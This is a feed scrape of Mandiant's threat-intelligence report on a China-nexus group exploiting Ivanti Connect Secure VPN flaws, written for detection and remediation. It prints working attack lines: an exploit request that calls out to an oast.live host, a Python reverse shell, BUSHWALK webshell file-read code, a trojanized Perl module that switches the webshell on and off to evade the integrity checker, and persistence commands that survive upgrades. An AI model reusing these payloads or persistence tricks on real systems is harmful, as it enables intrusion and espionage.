<a class="slashpop" href="http://twitter.com/home?status=Jeff+Bezos+Is+Funding+a+Wild+Hunt+for+the+Brain's+'Core+Algorithm'%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F08%2F0418226%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F08%2F0418226%2Fjeff-bezos-is-funding-a-wild-hunt-for-the-brains-core-algorithm%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/06/08/0418226/jeff-bezos-is-funding-a-wild-hunt-for-the-brains-core-algorithm?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts]]></title>
<description><![CDATA[Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer

 
Mandiant and Ivanti's investigations into widespread Ivanti zero-day exploitation have continued across a variety of industry verticals, including the U.S. defense industrial base s...]]></description>
<link>https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578877/it-security-nachrichten/cutting-edge-part-3-investigating-ivanti-connect-secure-vpn-exploitation-and-persistence-attempts/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>Mandiant and Ivanti's investigations into widespread <a href="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-targets-ivanti-zero-day" rel="noopener" target="_blank"><u>Ivanti zero-day exploitation</u></a> have continued across a variety of industry verticals, including the U.S. defense industrial base sector. Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a> used by <u>UNC5325</u>, which we introduced in our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>"Cutting Edge, Part 2" blog post</u></a>. </p>
<p>Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets. While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware's code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.</p>
<p>Ivanti customers are urged to take immediate action to ensure protection if they haven't done so already. A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available. See Ivanti's <a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" rel="noopener" target="_blank"><u>security advisory</u></a> and refer to our updated <a href="https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf" rel="noopener" target="_blank"><u>remediation and hardening guide</u></a>, which includes the latest recommendations.</p>
<p>The exploitation of the Ivanti zero-days has likely impacted numerous appliances. While much of the activity has been automated, there has been a smaller subset of follow-on activity providing further insights on attacker tactics, techniques, and procedures (TTPs). Mandiant assesses additional actors will likely begin to leverage these vulnerabilities to enable their operations.</p>
<p>To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>CVE</strong></p>
</td>
<td>
<p><strong>CVSS</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2023-46805</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>Authentication bypass vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 10, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21887</span></p>
</td>
<td>
<p><span>9.1</span></p>
</td>
<td>
<p><span>Command injection vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21888</span></p>
</td>
<td>
<p><span>8.8</span></p>
</td>
<td>
<p><span>Privilege escalation vulnerability in web component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Jan. 31, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-21893</span></p>
</td>
<td>
<p><span>8.2</span></p>
</td>
<td>
<p><span>SSRF vulnerability in the SAML component</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Feb. 08, 2024</span></p>
</td>
<td>
<p><span>CVE-2024-22024</span></p>
</td>
<td>
<p><span>8.3</span></p>
</td>
<td>
<p><span>XXE vulnerability in the SAML component</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em>Table 1: Ivanti vulnerability disclosures Jan. 10, 2024 to Feb. 8, 2024</em></span></p>
<p>In our <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>previous blog post</u></a>, we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell. The mitigation bypass is now tracked as <a href="https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-21893</u></a>. It is a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure (CS), Policy Secure (PS), and Neurons for Zero Trust Access (NZTA) appliances that was addressed in the patches and mitigations released on Jan. 31, 2024. </p>
<p>Since that post, an additional vulnerability was reported on Feb. 8, 2024, by Ivanti, <a href="https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" rel="noopener" target="_blank"><u>CVE-2024-22024</u></a>, related to an XML External Entity (XXE) vulnerability in the SAML component that allows unauthenticated attackers to gain access to restricted resources on patched appliances.</p>
<h2>Attribution</h2>
<h3>UNC5325</h3>
<p>UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.</p>
<h3>UNC3886</h3>
<p>UNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they <a href="https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass" rel="noopener" target="_blank"><u>leveraged novel techniques</u></a> against virtualization technologies. They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities. UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the US and APJ regions. We are continuing to gather evidence and identify overlaps between UNC3886 and other suspected Chinese espionage groups, including targeting and the use of distinct tactics, techniques, and procedures (TTPs). </p>
<h2>New TTPs and Malware</h2>
<p>Since our last <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>blog post</u></a> on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances. In addition, we have observed new TTPs that attempted to enable the custom backdoors to persist across factory resets, system upgrades, and patches. The limited attempts observed to maintain persistence have not been successful to date.</p>
<h3>Exploitation of CVE-2024-21893 (SSRF)</h3>
<p>Mandiant identified active exploitation of CVE-2024-21893 by UNC5325 as early as Jan. 19, 2024, targeting a limited number of Ivanti Connect Secure appliances.</p>
<p>On Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA. To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.</p>
<p>In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement. This included:</p>
<ul>
<li>CVE-2023-46805 (authentication bypass)</li>
<li>CVE-2024-21887 (command injection)</li>
<li>CVE-2024-21888 (privilege escalation)</li>
<li>CVE-2024-21893 (server-side request forgery)</li>
</ul>
<p>CVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887. This includes appliances with the XML mitigation released on Jan. 10, 2024.</p>
<h5>Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)</h5>
<p>Shortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.</p>
<p>In some instances, publicly available services, such as <a href="https://github.com/projectdiscovery/interactsh" rel="noopener" target="_blank"><u>Interactsh</u></a>, were used to validate whether the target was vulnerable to CVE-2024-21893.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket;socket.gethostbyname("&lt;randomstring&gt;.oast.live")'</code></pre>
<p><span><em><span>Figure 1: CVE-2024-21893 vulnerability validation</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /api/v1/license/keys-status/;python -c 'import 
socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect(("&lt;remote_ip&gt;",&lt;port&gt;));subprocess.call(["/bin/sh","-i"]</code></pre>
<p><span><em><span>Figure 2: Python reverse TCP shell</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Identifying Exploitation Attempts</h4>
<p>Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.</p>
<p>If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID <code>AUT31556</code> is generated when an unauthenticated attacker requests the vulnerable SAML endpoint, <code>/dana-ws/saml.ws</code>. The event includes the source IP address of the unauthenticated request.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP 
&lt;REDACTED&gt;.</code></pre>
<p><span><em><span>Figure 3: Event log entry showing unauthenticated request to vulnerable SAML endpoint</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893. The appliance generates an error event log entry with event ID <code>ERR31903</code> when the <code>saml-server</code> process crashes, which is potentially indicative of an exploitation attempt.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>ERR31093: Program saml-server recently failed.</code></pre>
<p><span><em><span>Figure 4: Event log entry of process crash</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.</p>
<p>Lastly, the crash of the <code>saml-server</code> process generates core dumps located in <code>/data/var/cores/</code>. If the core dumps are available, it is possible to extract the crafted SAML message, HTTP headers of the request, and the source IP address. We have observed the threat actor deleting the contents of the <code>cores</code> directory, but we have successfully recovered relevant fragments of the core dumps through file carving.</p>
<h3>BUSHWALK Variant</h3>
<p>In <a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><u>Cutting Edge, Part 2</u></a>, we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887. Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component, <code>querymanifest.cgi</code>.</p>
<p>Mandiant identified a new variant of BUSHWALK through our incident response engagements. This new variant of BUSHWALK was identified on a compromised appliance less than twelve (12) hours following Ivanti's disclosure of CVE-2024-21893 on Jan. 31, 2024. The variant is similar to the BUSHWALK sample described in our previous blog post, but with a new function named <code>checkVerison</code> that enables arbitrary file read from the appliance. The function is executed when the decrypted payload contains the string check. Figure 5 shows the relevant <code>checkVerison</code> function.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub checkVerison
{
    my ($file, $key) = @_;
    my $contents = "";
    my $buffer;
    my $bytesread = 0;
    my $totalbytesread = 0;
    local *FILE;
    CORE::open(*FILE, $file);
    while($bytesread = sysread(FILE, $buffer, 1024)) {
        $contents .= $buffer;
        $totalbytesread += $bytesread;
    }
    if ($totalbytesread == 0) {
        print "Unable to read file with path: $file";
        print CGI::header(-type=&gt;"text/html", -status=&gt; '404 Not Found');
        exit;
    }
    print CGI::header();
    $contents = RC4($key, $contents);
    $contents = MIME::Base64::encode_base64($contents);
    print $contents;
    close *FILE;
}</code></pre>
<p><span><em><span>Figure 5: BUSHWALK's </span><code>checkVerison</code><span> function for file reading</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Note that we have observed the same RC4 key for decrypting issued commands across the two BUSHWALK variants and all identified samples.</p>
<p>In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign. We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.</p>
<p>To accomplish this, the threat actor first modifies a Perl module, <code>DSUserAgentCap.pm</code>, that evaluates incoming user agents. The modification enables the threat actor to either activate or deactivate BUSHWALK depending on the incoming HTTP request's user agent.</p>
<p>Figure 6 provides the excerpt of the modification in <code>DSUserAgentCap.pm</code>. Note the difference in spelling between <code>App1eWebKit</code> and <code>AppIeWebKit</code> in the two user agent strings.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>sub getUserAgentType {
   my ($user_agent) = @_;
   if ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
App1eWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mount -o remount,rw /");
        system("/home/bin/configdecrypt /data/runtime
/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak");
        system("cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak");
        system("echo '/home/webserver/htdocs/dana-na/jam
/querymanifest.cgi' &gt;&gt; /home/etc/manifest/exclusion_list");
        system("mv /data/runtime/cockpit/diskAnalysis.bak 
/home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("chmod 755 /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi");
        system("mkdir /debug");
        system("/home/bin/restartServer.pl Restart");
        exit(0);
   }
   elsif ($user_agent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"){
        system("mv /home/webserver/htdocs/dana-na/jam
/querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("touch -r /home/webserver/htdocs/dana-na/auth
/setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi");
        system("/bin/sed -i '\$d' /home/etc/manifest/exclusion_list");
        system("rm -rf /debug");
        system("mount -o remount,ro /");
        exit(0);
   }
   else{
        my $type  = DSClientTypes::getUserAgentType($user_agent);
        return $type;
   }</code></pre>
<p><span><em><span>Figure 6: Excerpt of DSUserAgentCap.pm</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>An encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in <code>/data/runtime/cockpit/diskAnalysis</code>. </p>
<p>The activation routine (the <code>if</code> block) uses a built-in utility on the appliance located in <code>/home/bin/configdecrypt</code> used for decrypting the system's configuration. The routine executes the <code>configdecrypt</code> utility to decrypt <code>diskAnalysis</code> containing the BUSHWALK web shell. It then makes a backup of the original <code>querymanifest.cgi</code> file, adds it to the <code>exclusion_list</code>, moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.</p>
<p>The deactivation routine (the <code>elseif</code> block) restores the original <code>querymanifest.cgi</code> file, timestomps it using <code>touch</code> to hide their activity, removes the path of BUSHWALK from <code>exclusion_list</code>, and restarts the web server. However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool. It continues to quietly persist in <code>/data/runtime/cockpit/diskAnalysis</code> until the threat actor activates it again.</p>
<p>The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring. Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT. When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.</p>
<h3>SparkGateway Plugin Abuse</h3>
<p>In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors. SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH. The functionality of SparkGateway can be extended through plugins.</p>
<h4>PITFUEL Plugin</h4>
<p>Mandiant identified a SparkGateway plugin named <code>plugin.jar</code> (PITFUEL) that loads the shared object <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling <code>System.load()</code>. The shared object persistently deploys backdoors and contains capabilities to persist across system upgrade events, patches, and factory resets.</p>
<p>Figure 7 shows the relevant excerpt of the <code>PluginManager</code> class in PITFUEL.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class PluginManager {
  static {
    try {
      System.load("/home/runtime/SparkGateway/libchilkat.so");
    } catch (Exception exception) {}
    try {
      Config config = Config.getInstance();
      config.remove("plugin");
      config.remove("pluginFile");
    } catch (Exception exception) {}
    try {
      Logger logger = Logger.getLogger(Config.class.getName());
      SparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();
      logger.setFilter(sparkGatewayFilter);
    } catch (Exception exception) {}
  }
  
  static class SparkGatewayFilter implements Filter {
    public boolean isLoggable(LogRecord param1LogRecord) {
      return (param1LogRecord.getLevel().intValue() != Level.
SEVERE.intValue());
    }
  }
}
</code></pre>
<p><span><em><span>Figure 7: </span><code>PluginManager</code><span> class of SparkGateway plugin (PITFUEL)</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Upon execution, <code>libchilkat.so</code> (LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system. It accomplishes this by daemonizing itself, attempting to trap <code>SIGPIPE</code>, <code>SIGKILL</code>, and <code>SIGTERM</code> signals, and adjusting the out of memory (OOM) adjustment value (<code>oom_adj</code>) to <code>-17</code> to keep the process running even when the system is out of memory.</p>
<h4>Persistence Across System Upgrades and Patches</h4>
<p>Upon first execution, LITTLELAMB.WOOLTEA executes the <code>first_run()</code> function. It calls the <code>edit_current_data_backup()</code> function that appends its malicious components to an archive, <code>/data/pkg/data-backup.tgz</code>. Figure 8 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>gzip -d /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1

tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar 
/data/runtime/SparkGateway/libchilkat.so 
/data/runtime/SparkGateway/gateway.conf &gt; /dev/null 2&gt;&amp;1

gzip /data/pkg/data-backup.tar &gt; /dev/null 2&gt;&amp;1

mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 8: Command sequence executed by </span><code>edit_current_data_backup()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During a system upgrade or when applying a patch, <code>data-backup.tgz</code> contains a backup of the <code>data</code> directory that is restored after the upgrade event. In addition, the function timestomps <code>data-backup.tgz</code> by calling <code>utimensat</code>. This modification would ensure its malicious components (<code>plugin.jar</code>, <code>libchilkat.so</code>, and <code>gateway.conf</code>) persist across system upgrades and patches.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>(cd / ; tar -zxBf /data/pkg/data-backup.tgz &gt;/dev/null 2&gt;&amp;1)</code></pre>
<p><span><em><span>Figure 9: Decompression of </span><code>data-backup.tgz</code><span> during system upgrade events</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the malware contains a function named <code>upgrade_monitor()</code> that supports persistence across system upgrade and patch events. We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.</p>
<p>It monitors for system upgrade events by continually checking the filesystem for the existence of <code>/tmp/data/root/dev</code>. This path is used to support a system upgrade process. In other words, the presence of the path indicates to the malware the existence of a system upgrade event.</p>
<p>If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive <code>/tmp/data/root/samba_upgrade.tar</code>. During a system upgrade process, the appliance decompresses <code>samba_upgrade.tar</code> for data migration purposes. Figure 10 provides the command executed by <code>upgrade_monitor()</code> when it detects the existence of <code>/tmp/data/root/dev</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/data/root/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 10: Shell command executed by </span><code>upgrade_monitor()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During the system upgrade or patch process, the <code>post-install</code> bash script executes the following to decompress <code>samba_upgrade.tar</code>, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition. Figure 11 provides the relevant command sequence from <code>post-install</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -tf $upgrade_partition samba_upgrade.tar &gt; /dev/null 2&gt;&amp;1
if [ $? -eq 0 ]; then
    (cd /; tar -xf $upgrade_partition samba_upgrade.tar &gt;/dev/null)
fi</code></pre>
<p><span><em><span> Figure 11: Decompression of </span><code>samba_upgrade.tar</code><span> by </span><code>post-install</code><span> script</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Attempted Persistence Across Factory Resets</h4>
<p>Next, LITTLELAMB.WOOLTEA executes <code>first_run()</code>, which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at <code>/proc/ive/mbserialnumber</code> and adjusts its behavior to mount the root partition of the factory reset image for further modification.</p>
<p>If the four (4) bytes match the strings <code>0331</code>, <code>0332</code>, <code>0340</code>, <code>0481</code>, or <code>0482</code>, the malware executes the following command to mount <code>/dev/md5</code> (factory reset root partition) on <code>/dev/loop5</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/md5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 12: Command to set up loop device for block device </span><code>/dev/md5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Machine ID</strong></p>
</td>
<td>
<p><strong>Appliance Model Number</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0331</span></p>
</td>
<td>
<p><span>PSA 7000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0332</span></p>
</td>
<td>
<p><span>PSA 7000C</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0340</span></p>
</td>
<td>
<p><span>PSA 10000</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0481</span></p>
</td>
<td>
<p><span>ISA 8000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0482</span></p>
</td>
<td>
<p><span>ISA 8000C</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 2: Machine ID to physical appliance model number</span></em></span></p>
<p>Otherwise, the malware executes the following command to mount <code>/dev/xda5</code> (factory reset root partition) on <code>/dev/loop5</code> if the four (4) bytes do not match any of the machine ID strings or if it fails to read <code>/proc/ive/mbserialnumber</code>.</p>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/xda5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 13: Command to set up loop device for block device </span><code>/dev/xda5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Next, LITTLELAMB.WOOLTEA mounts the newly created loop device (<code>/dev/loop5</code>) to <code>/tmp/tmpmnt</code> to modify the factory reset root partition. Figure 14 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mkdir -m 777 /tmp/tmpmnt
mount /dev/loop5 /tmp/tmpmnt -t ext2</code></pre>
<p><span><em><span>Figure 14: Command to mount loop device </span><code>/dev/loop5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>It's important to note that <code>/bin/losetup</code> uses an embedded encryption key within the running version's kernel used to decrypt the running version's partition. This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.</p>
<p>However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel. If the current running version and the factory reset deployment versions differ (i.e., the appliance or VM has been updated at least once), then <code>/bin/losetup</code> will fail to decrypt the factory reset partition due to the encryption key mismatch and thus the malware will not persist after factory reset.</p>
<p>Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence. Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.</p>
<p>If <code>losetup</code> had succeeded in decrypting the factory reset image, the malware would continue its persistence workflow. To modify the factory reset process, it calls the <code>edit_factory_reset()</code> function that renames the <code>tar</code> binary to <code>tra</code> in the mounted factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mv /tmp/tmpmnt/bin/tar /tmp/tmpmnt/bin/tra</code></pre>
<p><span><em><span>Figure 15: Command to rename </span><code>tar</code><span> binary</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Then, the malware writes a trojanized version of the <code>tar</code> binary to <code>/tmp/tmpmnt/bin/tar</code>, makes the <code>tar</code> binary executable, and preemptively appends its malicious components (using the legitimate <code>tar</code> utility) to the archive <code>/tmp/tmpmnt/bin/samba_upgrade.tar</code> inside the factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 16: Command to archive components to </span><code>samba_upgrade.tar</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>The trojanized <code>tar</code> binary checks for a set of specific conditions to copy the malicious <code>/bin/samba_upgrade.tar</code> to <code>/tmp/samba_upgrade.tar</code> during the factory reset process. </p>
<ul>
<li>There are four arguments provided (<code>argc</code> is equal to 4)</li>
<li>The second argument, <code>argv[1]</code>, is <code>-cf</code> </li>
<li>The fourth argument, <code>argv[3]</code>, is <code>no-data</code></li>
</ul>
<p>If any of these conditions are not met, the trojanized <code>tar</code> binary executes the legitimate <code>tar</code> (<code>/bin/tra</code>) utility backed up in Figure 15.</p>
<p>The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration (<code>dsconfigreset</code>). The utility creates an empty file in <code>/tmp/no-data</code> and archives it using <code>/bin/tar -cf</code>. Figure 17 provides the relevant command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>echo "" &gt; /tmp/no-data
(cd /tmp; /bin/tar -cf $tmp_part no-data)</code></pre>
<p><span><em><span>Figure 17: Command executed during factory reset by </span><code>dsconfigreset</code></em></span></p></div>
